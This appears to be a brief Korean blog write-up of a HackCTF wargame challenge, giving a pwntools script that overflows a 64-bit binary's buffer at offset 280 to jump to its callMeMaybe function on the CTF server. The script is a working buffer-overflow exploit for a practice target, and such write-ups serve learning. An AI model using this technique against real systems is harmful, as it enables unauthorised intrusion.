x64 Buffer Overflow 본문
pattern을 삽입하여 offset을 확인했다.
280이 나왔다.
의심 가는 함수가 있다.
from pwn import *
p = remote("ctf.j0n9hyun.xyz",3004)
context.log_level = 'Debug'
elf = ELF("./64bof_basic")
payload = b"A"*(280) + p64(elf.symbols['callMeMaybe'])
p.sendline(payload)
p.interactive()
'wargame > HackCTF' 카테고리의 다른 글
Simple_Overflow_ver_2 (0) | 2021.12.08 |
---|---|
x64 Simple_size_BOF (0) | 2021.12.07 |
내 버퍼가 흘러넘친다!!! (0) | 2021.12.04 |
Basic_FSB (0) | 2021.12.04 |
Basic_BOF #2 (0) | 2021.12.04 |
Comments